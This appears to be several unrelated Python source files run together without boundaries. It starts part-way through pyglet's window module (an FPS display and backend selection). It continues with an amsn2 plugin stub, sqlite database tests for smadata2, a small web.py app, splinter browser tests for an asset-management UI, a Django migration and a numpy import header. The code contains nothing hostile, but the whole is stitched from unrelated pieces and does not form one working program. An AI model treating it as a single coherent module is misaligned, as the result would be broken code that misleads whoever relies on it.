                    'on_hide', 'on_context_lost', 'on_context_state_lost',
                    'on_draw'):
    BaseWindow.register_event_type(_event_name)
del _event_name


class FPSDisplay(object):
    """Display of a window's framerate.

    This is a convenience class to aid in profiling and debugging.  Typical
    usage is to create an `FPSDisplay` for each window, and draw the display
    at the end of the windows' `on_draw` event handler::

        window = pyglet.window.Window()
        fps_display = FPSDisplay(window)

        @window.event
        def on_draw():
            # ... perform ordinary window drawing operations ...

            fps_display.draw()

    The style and position of the display can be modified via the `label`
    attribute.  Different text can be substituted by overriding the
    `set_fps` method.  The display can be set to update more or less often 
    by setting the `update_period` attribute.

    :Ivariables:
        `label` : Label
            The text label displaying the framerate. 

    """

    #: Time in seconds between updates.
    #:
    #: :type: float
    update_period = 0.25

    def __init__(self, window):
        from time import time
        from pyglet.text import Label
        # Grey translucent label near the lower-left corner of the window.
        self.label = Label('', x=10, y=10, 
                           font_size=24, bold=True,
                           color=(127, 127, 127, 127))

        self.window = window
        # Hook the window's flip so update() runs once per buffer swap.
        self._window_flip = window.flip
        window.flip = self._hook_flip

        # Seconds and frames accumulated since the last label refresh.
        self.time = 0.0
        self.last_time = time()
        self.count = 0

    def update(self):
        """Records a new data point at the current time.  This method
        is called automatically when the window buffer is flipped.
        """
        from time import time
        t = time()
        self.count += 1
        self.time += t - self.last_time
        self.last_time = t

        # Refresh the label once per update_period; keep the remainder
        # (modulo) so the next measurement window is not skewed.
        if self.time >= self.update_period:
            self.set_fps(self.count / self.update_period)
            self.time %= self.update_period
            self.count = 0

    def set_fps(self, fps):
        """Set the label text for the given FPS estimation.

        Called by `update` every `update_period` seconds.

        :Parameters:
            `fps` : float
                Estimated framerate of the window.

        """
        self.label.text = '%.2f' % fps

    def draw(self):
        """Draw the label.

        The OpenGL state is assumed to be at default values, except
        that the MODELVIEW and PROJECTION matrices are ignored.  At
        the return of this method the matrix mode will be MODELVIEW.
        """
        # Save both matrices and install a window-sized orthographic
        # projection so the label draws in pixel coordinates.
        gl.glMatrixMode(gl.GL_MODELVIEW)
        gl.glPushMatrix()
        gl.glLoadIdentity()

        gl.glMatrixMode(gl.GL_PROJECTION)
        gl.glPushMatrix()
        gl.glLoadIdentity()
        gl.glOrtho(0, self.window.width, 0, self.window.height, -1, 1)
        
        self.label.draw()

        # Pops PROJECTION (the current mode), then restores MODELVIEW.
        gl.glPopMatrix()

        gl.glMatrixMode(gl.GL_MODELVIEW)
        gl.glPopMatrix()

    def _hook_flip(self):
        # Record the frame, then perform the real buffer flip.
        self.update()
        self._window_flip()

if _is_epydoc:
    # We are building documentation: document BaseWindow under the
    # public name `Window`.
    Window = BaseWindow
    Window.__name__ = 'Window'
    del BaseWindow


else:
    # Try to determine which platform to use.
    if pyglet.compat_platform == 'darwin':
        # OS X has two backends; the darwin_cocoa option selects which.
        if pyglet.options['darwin_cocoa']:
            from pyglet.window.cocoa import CocoaWindow as Window
        else:
            from pyglet.window.carbon import CarbonWindow as Window
    elif pyglet.compat_platform in ('win32', 'cygwin'):
        from pyglet.window.win32 import Win32Window as Window
    else:
        # All other platforms fall back to the X11 backend.
        # XXX HACK around circ problem, should be fixed after removal of
        # shadow nonsense
        #pyglet.window = sys.modules[__name__]
        #import key, mouse

        from pyglet.window.xlib import XlibWindow as Window


# Deprecated API
def get_platform():
    """Return the `Platform` instance most appropriate for this system.

    :deprecated: Use `pyglet.canvas.Display`.

    :rtype: `Platform`
    :return: The platform instance.
    """
    return Platform()


class Platform(object):
    """Operating-system-level functionality.

    The platform instance can only be obtained with `get_platform`.  Use
    the platform to obtain a `Display` instance.

    :deprecated: Use `pyglet.canvas.Display`
    """
    def get_display(self, name):
        """Get a display device by name.

        This is meaningful only under X11, where the `name` is a
        string including the host name and display number; for example
        ``"localhost:1"``.

        On platforms other than X11, `name` is ignored and the default
        display is returned.  pyglet does not support multiple
        video devices on Windows or OS X.  If more than one device is
        attached, they will appear as a single virtual device comprising
        all the attached screens.

        :deprecated: Use `pyglet.canvas.get_display`.

        :Parameters:
            `name` : str
                The name of the display to connect to.

        :rtype: `Display`
        """
        # Look for an already-open display with this name; only create a
        # new connection if none matches (creation has side effects, so
        # it must not be evaluated eagerly as a next() default).
        found = next((d for d in pyglet.app.displays if d.name == name), None)
        if found is not None:
            return found
        return pyglet.canvas.Display(name)

    def get_default_display(self):
        """Get the default display device.

        :deprecated: Use `pyglet.canvas.get_display`.

        :rtype: `Display`
        """
        return pyglet.canvas.get_display()

if _is_epydoc:
    # Documentation build: expose deprecated stub classes so the old API
    # is still documented.
    class Display(object):
        """A display device supporting one or more screens.

        Use `Platform.get_display` or `Platform.get_default_display` to obtain
        an instance of this class.  Use a display to obtain `Screen` instances.

        :deprecated: Use `pyglet.canvas.Display`.
        """
        def __init__(self):
            raise NotImplementedError('deprecated')

        def get_screens(self):
            """Get the available screens.

            A typical multi-monitor workstation comprises one `Display` with
            multiple `Screen` s.  This method returns a list of screens which
            can be enumerated to select one for full-screen display.

            For the purposes of creating an OpenGL config, the default screen
            will suffice.

            :rtype: list of `Screen`
            """
            raise NotImplementedError('deprecated')

        def get_default_screen(self):
            """Get the default screen as specified by the user's operating system
            preferences.

            :rtype: `Screen`
            """
            raise NotImplementedError('deprecated')

        def get_windows(self):
            """Get the windows currently attached to this display.

            :rtype: sequence of `Window`
            """
            raise NotImplementedError('deprecated')
else:
    # Normal runtime: the deprecated names simply alias pyglet.canvas.
    Display = pyglet.canvas.Display
    Screen = pyglet.canvas.Screen


# XXX remove
# Create shadow window. (trickery is for circular import)
if not _is_epydoc:
    # Make this module reachable as pyglet.window before the hidden
    # context-sharing window is created.
    pyglet.window = sys.modules[__name__]
    gl._create_shadow_window()


# plugins module for amsn2
"""
Plugins with amsn2 will be a subclass of the aMSNPlugin() class.
When this module is initially imported it should load the plugins from the last session. Done in the init() proc.
Then the GUI should call plugins.loadPlugin(name) or plugins.unLoadPlugin(name) in order to deal with plugins.
"""

# init()
# Called when the plugins module is imported (only for the first time).
# Should find plugins and populate a list ready for getPlugins().
# Should also auto-update all plugins.
def init():
    """Find available plugins, populate the list used by getPlugins(),
    and auto-update all plugins."""
    pass

# loadPlugin(plugin_name)
# Called (by the GUI or from init()) to load a plugin. plugin_name as set in plugin's XML (or from getPlugins()).
# This loads the module for the plugin. The module is then responsible for calling plugins.registerPlugin(instance).
def loadPlugin(plugin_name):
    """Load the module for the named plugin.

    The loaded module is responsible for calling
    plugins.registerPlugin(instance) itself.

    @type plugin_name: str
    """
    pass

# unLoadPlugin(plugin_name)
# Called to unload a plugin. Name is name as set in plugin's XML.
def unLoadPlugin(plugin_name):
    """Unload the named plugin (name as set in the plugin's XML).

    @type plugin_name: str
    """
    pass

# registerPlugin(plugin_instance)
# Saves the instance of the plugin, and registers it in the loaded list.
def registerPlugin(plugin_instance):
    """Save the plugin instance and record it in the loaded list.

    @type plugin_instance: L{amsn2.plugins.developers.aMSNPlugin}
    """
    pass

# getPlugins()
# Returns a list of all available plugins, as in ['Plugin 1', 'Plugin 2']
def getPlugins():
    """Return a list of all available plugin names,
    e.g. ['Plugin 1', 'Plugin 2']."""
    pass

# getPluginsWithStatus()
# Returns a list with a list item for each plugin with the plugin's name, and Loaded or NotLoaded either way.
# IE: [['Plugin 1', 'Loaded'], ['Plugin 2', 'NotLoaded']]
def getPluginsWithStatus():
    """Return a list of [name, status] pairs for every plugin, where
    status is 'Loaded' or 'NotLoaded',
    e.g. [['Plugin 1', 'Loaded'], ['Plugin 2', 'NotLoaded']]."""
    pass

# getLoadedPlugins()
# Returns a list of loaded plugins. as in ['Plugin 1', 'Plugin N']
def getLoadedPlugins():
    """Return a list of the names of currently loaded plugins,
    e.g. ['Plugin 1', 'Plugin N']."""
    pass

# findPlugin(plugin_name)
# Retruns the running instance of the plugin with name plugin_name, or None if not found.
def findPlugin(plugin_name):
    """Return the running instance of the named plugin, or None if it is
    not found.

    @type plugin_name: str
    """
    pass

# saveConfig(plugin_name, data)
def saveConfig(plugin_name, data):
    """Persist configuration data for the named plugin.

    @type plugin_name: str
    @type data: object
    """
    pass

# Calls the init procedure.
# Will only be called on the first import (thanks to python): later
# imports reuse the cached module object and do not re-run this.
init()

#! /usr/bin/env python

from __future__ import print_function

import StringIO
import os
import os.path
import errno
import sqlite3

from nose.tools import *

import smadata2.db
import smadata2.db.mock
from smadata2 import check

def removef(filename):
    """Remove *filename* if it exists; a missing file is not an error.

    Any OSError other than ENOENT (no such file) is re-raised.
    """
    try:
        os.remove(filename)
    except OSError as err:
        if err.errno != errno.ENOENT:
            raise


class BaseDBChecker(object):
    """Common fixture scaffolding for the database checks.

    Subclasses must provide opendb(); sample_data() may be overridden
    to preload records before each test.
    """

    def setUp(self):
        # Open a fresh database and seed it before every test.
        self.db = self.opendb()
        self.sample_data()

    def tearDown(self):
        # Subclasses override this to clean up database files.
        pass

    def sample_data(self):
        # Default: no sample records.
        pass


class MockDBChecker(BaseDBChecker):
    """Run the checks against the in-memory mock database."""

    def opendb(self):
        return smadata2.db.mock.MockDatabase()


class BaseSQLite(object):
    """Mixin managing an on-disk sqlite test database file.

    prepare_sqlite() removes any stale database/backup files, lets the
    subclass prepopulate the database, then snapshots the file contents
    so schema-update tests can compare against the original.
    """

    def prepare_sqlite(self):
        self.dbname = "__testdb__smadata2_%s_.sqlite" % self.__class__.__name__
        self.bakname = self.dbname + ".bak"

        # Start with a blank slate
        removef(self.dbname)
        removef(self.bakname)

        self.prepopulate()

        if os.path.exists(self.dbname):
            # Use a context manager so the file handle is closed promptly;
            # the original code leaked the handle returned by open().
            # Text mode is kept so the snapshot stays comparable with the
            # text-mode read in UpdateSQLiteChecker.test_backup.
            with open(self.dbname) as f:
                self.original = f.read()
        else:
            self.original = None

    def prepopulate(self):
        # Subclasses override this to create schema/data before snapshot.
        pass


class SQLiteDBChecker(BaseSQLite, BaseDBChecker):
    # Runs the checks against a real sqlite database on disk.
    #
    # NOTE(review): this module imports smadata2.db and smadata2.db.mock
    # but not smadata2.db.sqlite explicitly; presumably the package makes
    # the submodule available — verify against smadata2.db.__init__.

    def opendb(self):
        self.prepare_sqlite()
        return smadata2.db.sqlite.create_or_update(self.dbname)

    def tearDown(self):
        # Remove the working database and its backup, then base cleanup.
        removef(self.dbname)
        removef(self.bakname)
        super(SQLiteDBChecker, self).tearDown()


class SimpleChecks(BaseDBChecker):
    # Basic add/get round-trips against an initially empty database.

    def test_trivial(self):
        assert isinstance(self.db, smadata2.db.base.BaseDatabase)

    def test_add_get_historic(self):
        # Serial is defined as INTEGER, but we abuse the fact that
        # sqlite doesn't actually make a distinction
        serial = "__TEST__"

        self.db.add_historic(serial, 0, 0)
        self.db.add_historic(serial, 300, 10)
        self.db.add_historic(serial, 3600, 20)

        v0 = self.db.get_one_historic(serial, 0)
        assert_equals(v0, 0)

        v300 = self.db.get_one_historic(serial, 300)
        assert_equals(v300, 10)

        v3600 = self.db.get_one_historic(serial, 3600)
        assert_equals(v3600, 20)

        # A timestamp that was never recorded yields None.
        vmissing = self.db.get_one_historic(serial, 9999)
        assert vmissing is None

    def test_get_last_historic_missing(self):
        # With no records at all, get_last_historic reports None.
        serial = "__TEST__"

        last = self.db.get_last_historic(serial)
        assert last is None

    def test_get_last_historic(self):
        # get_last_historic tracks the maximum timestamp seen, not the
        # most recently inserted one (see the final 2000 insert).
        serial = "__TEST__"

        self.db.add_historic(serial, 0, 0)
        assert_equals(self.db.get_last_historic(serial), 0)

        self.db.add_historic(serial, 300, 0)
        assert_equals(self.db.get_last_historic(serial), 300)

        self.db.add_historic(serial, 3600, 0)
        assert_equals(self.db.get_last_historic(serial), 3600)

        self.db.add_historic(serial, 2000, 0)
        assert_equals(self.db.get_last_historic(serial), 3600)


class AggregateChecks(BaseDBChecker):
    # Aggregation checks over two inverters sampled through one simulated
    # day; serial2 always yields twice serial1 (see sample_data below).

    def sample_data(self):
        super(AggregateChecks, self).sample_data()

        self.serial1 = "__TEST__1"
        self.serial2 = "__TEST__2"

        # Day boundaries in seconds: flat before dawn (08:00), ramp until
        # dusk (20:00), flat afterwards; samples every 300 s.
        self.dawn = 8*3600
        self.dusk = 20*3600

        sampledata = check.generate_linear(0, self.dawn, self.dusk, 24*3600,
                                           0, 1)

        for ts, y in sampledata:
            self.db.add_historic(self.serial1, ts, y)
            self.db.add_historic(self.serial2, ts, 2*y)

    def test_basic(self):
        for ts in range(0, self.dawn, 300):
            y1 = self.db.get_one_historic(self.serial1, ts)
            y2 = self.db.get_one_historic(self.serial2, ts)

            assert_equals(y1, 0)
            assert_equals(y2, 0)

        for i, ts in enumerate(range(self.dawn, self.dusk, 300)):
            y1 = self.db.get_one_historic(self.serial1, ts)
            y2 = self.db.get_one_historic(self.serial2, ts)

            assert_equals(y1, i)
            assert_equals(y2, 2*i)

        # NOTE(review): relies on Python 2 integer division (this module
        # imports StringIO, so it targets py2); under Python 3 `/` would
        # produce a float — verify before porting.
        val = (self.dusk - self.dawn - 1) / 300
        for ts in range(self.dusk, 24*3600, 300):
            y1 = self.db.get_one_historic(self.serial1, ts)
            y2 = self.db.get_one_historic(self.serial2, ts)

            assert_equals(y1, val)
            assert_equals(y2, 2*val)

    def test_aggregate_one(self):
        val = self.db.get_aggregate_one_historic(self.dusk,
                                                 (self.serial1, self.serial2))
        assert_equals(val, 3*((self.dusk - self.dawn - 2) / 300))

    def check_aggregate_range(self, from_, to_):
        results = self.db.get_aggregate_historic(from_, to_,
                                                 (self.serial1, self.serial2))

        first = results[0][0]
        last = results[-1][0]

        # Results must cover [from_, to_) in 300 s steps.
        assert_equals(first, from_)
        assert_equals(last, to_ - 300)

        for ts, y in results:
            if ts < self.dawn:
                assert_equals(y, 0)
            elif ts < self.dusk:
                assert_equals(y, 3*((ts - self.dawn) / 300))
            else:
                assert_equals(y, 3*((self.dusk - self.dawn - 1) / 300))

    def test_aggregate(self):
        # nose generator test: yields (callable, args...) tuples which are
        # each run as a separate test case.
        yield self.check_aggregate_range, 0, 24*3600
        yield self.check_aggregate_range, 8*3600, 20*3600
        yield self.check_aggregate_range, 13*3600, 14*3600


#
# Construct the basic tests as a cross-product
#
# Each generated class (e.g. Test_SimpleChecks_MockDBChecker) combines one
# check-suite mixin with one database fixture; the test runner picks them
# up by the "Test" name prefix.
for cset in (SimpleChecks, AggregateChecks):
    for db in (MockDBChecker, SQLiteDBChecker):
        name = "_".join(("Test", cset.__name__, db.__name__))
        globals()[name] = type(name, (cset, db), {})


#
# Tests for sqlite schema updating
#
class UpdateSQLiteChecker(Test_SimpleChecks_SQLiteDBChecker):
    """Checks that a schema update preserves existing data and keeps a backup.

    Subclasses provide prepopulate() to build the old-format database,
    including PRESERVE_RECORD, before the update runs.
    """

    # (inverter_serial, timestamp, total_yield) row that must survive the update.
    PRESERVE_RECORD = ("PRESERVE", 0, 31415)

    def test_backup(self):
        """The updater must leave a byte-identical backup of the old DB."""
        assert os.path.exists(self.bakname)
        # Fix: close the backup file deterministically instead of leaking
        # the handle from open(...).read() to the garbage collector.
        with open(self.bakname) as f:
            backup = f.read()
        assert_equals(self.original, backup)

    def test_preserved(self):
        """The record inserted pre-update must still be readable afterwards."""
        serial, timestamp, tyield = self.PRESERVE_RECORD

        assert_equals(self.db.get_last_historic(serial), timestamp)
        assert_equals(self.db.get_one_historic(serial, timestamp), tyield)


class TestUpdateNoPVO(UpdateSQLiteChecker):
    """Schema update starting from a v0 database without the pvoutput table."""

    def prepopulate(self):
        """Create a v0-format DB containing PRESERVE_RECORD."""
        DB_MAGIC = 0x71534d41
        DB_VERSION = 0

        conn = sqlite3.connect(self.dbname)
        conn.executescript("""
CREATE TABLE generation (inverter_serial INTEGER,
                            timestamp INTEGER,
                            total_yield INTEGER,
                            PRIMARY KEY (inverter_serial, timestamp));
CREATE TABLE schema (magic INTEGER, version INTEGER);""")
        conn.execute("INSERT INTO schema (magic, version) VALUES (?, ?)",
                     (DB_MAGIC, DB_VERSION))
        conn.commit()

        conn.execute("""INSERT INTO generation (inverter_serial, timestamp,
                                                 total_yield)
                            VALUES (?, ?, ?)""", self.PRESERVE_RECORD)
        conn.commit()

        # Fix: close the connection explicitly; `del conn` only dropped a
        # reference and left closing to garbage collection.
        conn.close()


class TestUpdateV0(UpdateSQLiteChecker):
    """Schema update starting from a v0 database that has a pvoutput table."""

    def prepopulate(self):
        """Create a v0-format DB (with pvoutput) containing PRESERVE_RECORD."""
        DB_MAGIC = 0x71534d41
        DB_VERSION = 0

        conn = sqlite3.connect(self.dbname)
        conn.executescript("""
CREATE TABLE generation (inverter_serial INTEGER,
                            timestamp INTEGER,
                            total_yield INTEGER,
                            PRIMARY KEY (inverter_serial, timestamp));
CREATE TABLE schema (magic INTEGER, version INTEGER);
CREATE TABLE pvoutput (sid STRING,
                       last_datetime_uploaded INTEGER);""")
        conn.execute("INSERT INTO schema (magic, version) VALUES (?, ?)",
                     (DB_MAGIC, DB_VERSION))
        conn.commit()

        conn.execute("""INSERT INTO generation (inverter_serial, timestamp,
                                                 total_yield)
                            VALUES (?, ?, ?)""", self.PRESERVE_RECORD)
        conn.commit()

        # Fix: close the connection explicitly; `del conn` only dropped a
        # reference and left closing to garbage collection.
        conn.close()


class BadSchemaSQLiteChecker(BaseSQLite):
    """Base for tests expecting the DB open to fail with WrongSchema."""

    def setUp(self):
        # Prepare the sqlite fixture path; subclasses may prepopulate it
        # with an invalid schema.
        self.prepare_sqlite()

    @raises(smadata2.db.WrongSchema)
    def test_open(self):
        """Opening a DB without a valid schema must raise WrongSchema."""
        self.db = smadata2.db.SQLiteDatabase(self.dbname)


class TestEmptySQLiteDB(BadSchemaSQLiteChecker):
    """Check that we correctly fail on an empty DB"""

    def test_is_empty(self):
        # No prepopulate() here, so the DB file must not exist at all.
        assert not os.path.exists(self.dbname)


class TestBadSQLite(BadSchemaSQLiteChecker):
    """Check that we correctly fail attempting to update an unknown format"""

    def prepopulate(self):
        """Create a DB whose only table is unrelated to our schema."""
        conn = sqlite3.connect(self.dbname)
        conn.execute("CREATE TABLE unrelated (random STRING, data INTEGER)")
        conn.commit()
        # Fix: close the connection explicitly; `del conn` only dropped a
        # reference and left closing to garbage collection.
        conn.close()

    @raises(smadata2.db.WrongSchema)
    def test_update(self):
        """create_or_update must refuse a DB with an unrecognized schema."""
        db = smadata2.db.sqlite.create_or_update(self.dbname)

import web


# URL routing: map /hello to the Index handler class (resolved via globals()).
urls = (
        '/hello','Index'
        )


app = web.application(urls,globals())

# Template loader; every template is wrapped in the "layout" base template.
# NOTE(review): the template directory is an absolute, machine-specific path.
render = web.template.render('/usr/local/LPTHW/ex51/gothonweb/templates/',base="layout")



class Index(object):
    """Handler for /hello: show the greeting form, then echo the greeting."""

    def GET(self):
        """Serve the empty greeting form."""
        return render.hello_form()

    def POST(self):
        """Build a greeting from the submitted form and render it."""
        form = web.input(name="Nobody", greet="Hello")
        return render.index(greeting="%s,%s" % (form.greet, form.name))



# Start the web.py development server when run as a script.
if __name__ == '__main__':
    app.run()

from splinter import Browser
from time import sleep
from selenium.common.exceptions import ElementNotVisibleException
from settings import settings
from lib import db
from lib import assets_helper
import unittest
from datetime import datetime, timedelta

# Fixture: a *disabled* web-page asset whose active window spans "now".
asset_x = {
    'mimetype': u'web',
    'asset_id': u'4c8dbce552edb5812d3a866cfe5f159d',
    'name': u'WireLoad',
    'uri': u'http://www.wireload.net',
    'start_date': datetime.now() - timedelta(days=1),
    'end_date': datetime.now() + timedelta(days=1),
    'duration': u'5',
    'is_enabled': 0,
    'nocache': 0,
    'play_order': 1,
}

# Fixture: an *enabled* image asset, ordered before asset_x.
asset_y = {
    'mimetype': u'image',
    'asset_id': u'7e978f8c1204a6f70770a1eb54a76e9b',
    'name': u'Google',
    'uri': u'https://www.google.com/images/srpr/logo3w.png',
    'start_date': datetime.now() - timedelta(days=1),
    'end_date': datetime.now() + timedelta(days=1),
    'duration': u'6',
    'is_enabled': 1,
    'nocache': 0,
    'play_order': 0,
}

# UI endpoints under test; HTTP basic-auth credentials are embedded inline.
main_page_url = 'http://foo:bar@localhost:8080'
settings_url = 'http://foo:bar@localhost:8080/settings'
system_info_url = 'http://foo:bar@localhost:8080/system_info'


def wait_for_and_do(browser, query, callback):
    """Run *callback* on the first element matching CSS *query*.

    Retries while the element exists but is not yet visible, re-raising
    the exception after 20 failed attempts.
    """
    attempts = 0
    while True:
        try:
            callback(browser.find_by_css(query).first)
            return
        # Fix: `except X as e` (the original py2-only `except X, e` form
        # does not parse on Python 3).
        except ElementNotVisibleException as e:
            if attempts > 20:
                raise e
            attempts += 1
            # Fix: back off briefly instead of busy-spinning the CPU while
            # the element renders.
            sleep(0.5)


class WebTest(unittest.TestCase):
    """Browser-level smoke tests for the asset-management web UI.

    Each test drives a real browser via splinter against the app on
    localhost:8080, then verifies the resulting state directly in the
    asset database. The sleep() calls give the UI animations and the
    backend time to finish before the next step or assertion.
    """

    def setUp(self):
        # Start every test from an empty asset table.
        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)
            for asset in assets:
                assets_helper.delete(conn, asset['asset_id'])

    def tearDown(self):
        pass

    def test_add_asset_url(self):
        """Adding an asset by URL stores it with webpage defaults."""
        with Browser() as browser:
            browser.visit(main_page_url)

            wait_for_and_do(browser, '#add-asset-button', lambda btn: btn.click())
            sleep(1)

            wait_for_and_do(browser, 'input[name="uri"]', lambda field: field.fill('http://example.com'))
            sleep(1)

            wait_for_and_do(browser, '#add-form', lambda form: form.click())
            sleep(1)

            wait_for_and_do(browser, '#save-asset', lambda btn: btn.click())
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 1)
            asset = assets[0]

            # The name defaults to the URI when none is given.
            self.assertEqual(asset['name'], u'http://example.com')
            self.assertEqual(asset['uri'], u'http://example.com')
            self.assertEqual(asset['mimetype'], u'webpage')
            self.assertEqual(asset['duration'], settings['default_duration'])

    def test_edit_asset(self):
        """Editing an existing asset updates its duration."""
        with db.conn(settings['database']) as conn:
            assets_helper.create(conn, asset_x)

        with Browser() as browser:
            browser.visit(main_page_url)
            wait_for_and_do(browser, '.edit-asset-button', lambda btn: btn.click())
            sleep(1)

            wait_for_and_do(browser, 'input[name="duration"]', lambda field: field.fill('333'))
            sleep(1)  # wait for new-asset panel animation

            wait_for_and_do(browser, '#add-form', lambda form: form.click())
            sleep(1)

            wait_for_and_do(browser, '#save-asset', lambda btn: btn.click())
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 1)
            asset = assets[0]

            self.assertEqual(asset['duration'], u'333')

    def test_add_asset_image_upload(self):
        """Uploading an image creates an image asset named after the file."""
        # Assumes /tmp/image.png exists on the test host — provisioned
        # outside this suite.
        image_file = '/tmp/image.png'

        with Browser() as browser:
            browser.visit(main_page_url)

            browser.find_by_id('add-asset-button').click()
            sleep(1)

            wait_for_and_do(browser, 'a[href="#tab-file_upload"]', lambda tab: tab.click())
            wait_for_and_do(browser, 'input[name="file_upload"]', lambda input: input.fill(image_file))
            sleep(1)  # wait for new-asset panel animation

            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 1)
            asset = assets[0]

            self.assertEqual(asset['name'], u'image.png')
            self.assertEqual(asset['mimetype'], u'image')
            self.assertEqual(asset['duration'], settings['default_duration'])

    def test_add_asset_video_upload(self):
        """Uploading a video creates a video asset with its own duration."""
        # Assumes /tmp/video.flv exists on the test host; the expected
        # duration u'54' matches that specific fixture file.
        video_file = '/tmp/video.flv'

        with Browser() as browser:
            browser.visit(main_page_url)

            browser.find_by_id('add-asset-button').click()
            sleep(1)

            wait_for_and_do(browser, 'a[href="#tab-file_upload"]', lambda tab: tab.click())
            wait_for_and_do(browser, 'input[name="file_upload"]', lambda input: input.fill(video_file))
            sleep(1)  # wait for new-asset panel animation

            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 1)
            asset = assets[0]

            self.assertEqual(asset['name'], u'video.flv')
            self.assertEqual(asset['mimetype'], u'video')
            self.assertEqual(asset['duration'], u'54')

    def test_add_two_assets_upload(self):
        """Two consecutive uploads create two independent assets."""
        video_file = '/tmp/video.flv'
        image_file = '/tmp/image.png'

        with Browser() as browser:
            browser.visit(main_page_url)

            browser.find_by_id('add-asset-button').click()
            sleep(1)

            wait_for_and_do(browser, 'a[href="#tab-file_upload"]', lambda tab: tab.click())
            wait_for_and_do(browser, 'input[name="file_upload"]', lambda input: input.fill(image_file))
            wait_for_and_do(browser, 'input[name="file_upload"]', lambda input: input.fill(video_file))

            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 2)

            self.assertEqual(assets[0]['name'], u'image.png')
            self.assertEqual(assets[0]['mimetype'], u'image')
            self.assertEqual(assets[0]['duration'], settings['default_duration'])

            self.assertEqual(assets[1]['name'], u'video.flv')
            self.assertEqual(assets[1]['mimetype'], u'video')
            self.assertEqual(assets[1]['duration'], u'54')

    def test_add_asset_streaming(self):
        """An rtmp:// URI is classified as a streaming asset."""
        with Browser() as browser:
            browser.visit(main_page_url)

            wait_for_and_do(browser, '#add-asset-button', lambda btn: btn.click())
            sleep(1)

            wait_for_and_do(browser, 'input[name="uri"]', lambda field: field.fill('rtmp://localhost:1935/app/video.flv'))
            sleep(1)

            wait_for_and_do(browser, '#add-form', lambda form: form.click())
            sleep(1)

            wait_for_and_do(browser, '#save-asset', lambda btn: btn.click())
            sleep(10)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 1)
            asset = assets[0]

            self.assertEqual(asset['name'], u'rtmp://localhost:1935/app/video.flv')
            self.assertEqual(asset['uri'], u'rtmp://localhost:1935/app/video.flv')
            self.assertEqual(asset['mimetype'], u'streaming')
            self.assertEqual(asset['duration'], settings['default_streaming_duration'])

    def test_rm_asset(self):
        """Deleting an asset via the UI removes it from the database."""
        with db.conn(settings['database']) as conn:
            assets_helper.create(conn, asset_x)

        with Browser() as browser:
            browser.visit(main_page_url)

            wait_for_and_do(browser, '.delete-asset-button', lambda btn: btn.click())
            wait_for_and_do(browser, '.confirm-delete', lambda btn: btn.click())
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)
            self.assertEqual(len(assets), 0)

    def test_enable_asset(self):
        """Clicking the "on" toggle enables a disabled asset."""
        with db.conn(settings['database']) as conn:
            assets_helper.create(conn, asset_x)

        with Browser() as browser:
            browser.visit(main_page_url)
            wait_for_and_do(browser, 'span[class="on"]', lambda btn: btn.click())
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)
            self.assertEqual(len(assets), 1)

            asset = assets[0]
            self.assertEqual(asset['is_enabled'], 1)

    def test_disable_asset(self):
        """Clicking the "off" toggle disables an enabled asset."""
        with db.conn(settings['database']) as conn:
            # asset_x is disabled by default; enable a copy first.
            _asset_x = asset_x.copy()
            _asset_x['is_enabled'] = 1
            assets_helper.create(conn, _asset_x)

        with Browser() as browser:
            browser.visit(main_page_url)

            wait_for_and_do(browser, 'span[class="off"]', lambda btn: btn.click())
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)
            self.assertEqual(len(assets), 1)

            asset = assets[0]
            self.assertEqual(asset['is_enabled'], 0)

    def test_reorder_asset(self):
        """Drag-and-drop reordering swaps the assets' play_order values."""
        with db.conn(settings['database']) as conn:
            _asset_x = asset_x.copy()
            _asset_x['is_enabled'] = 1
            assets_helper.create(conn, _asset_x)
            assets_helper.create(conn, asset_y)

        with Browser() as browser:
            browser.visit(main_page_url)

            asset_x_for_drag = browser.find_by_id(asset_x['asset_id'])
            sleep(1)

            asset_y_to_reorder = browser.find_by_id(asset_y['asset_id'])
            asset_x_for_drag.drag_and_drop(asset_y_to_reorder)
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            x = assets_helper.read(conn, asset_x['asset_id'])
            y = assets_helper.read(conn, asset_y['asset_id'])

            self.assertEqual(x['play_order'], 0)
            self.assertEqual(y['play_order'], 1)

    def test_settings_page_should_work(self):
        """The settings page must render without a server error."""
        with Browser() as browser:
            browser.visit(settings_url)
            self.assertEqual(browser.is_text_present('Error: 500 Internal Server Error'), False,
                             '500: internal server error not expected')

    def test_system_info_page_should_work(self):
        """The system-info page must render without a server error."""
        with Browser() as browser:
            browser.visit(system_info_url)
            self.assertEqual(browser.is_text_present('Error: 500 Internal Server Error'), False,
                             '500: internal server error not expected')

# encoding: utf8
from django.db import models, migrations


class Migration(migrations.Migration):
    """Initial migration: create the Contact and Commits models."""

    dependencies = []

    operations = [
        migrations.CreateModel(
            name='Contact',
            fields=[
                (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=255)),
                ('email', models.EmailField(max_length=75)),
                ('message', models.TextField()),
                ('date', models.DateField(auto_now=True)),
            ],
            options={},
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Commits',
            fields=[
                (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),
                ('date', models.DateTimeField()),
                ('title', models.CharField(max_length=255)),
                ('code', models.CharField(max_length=255)),
                ('summary', models.TextField()),
            ],
            options={},
            bases=(models.Model,),
        ),
    ]

# force floating point division. Can still use integer with //
from __future__ import division
# This file is used for importing the common utilities classes.
import numpy as np
import matplotlib.pyplot as plt
import sys


sys.path.append("../../../../../")
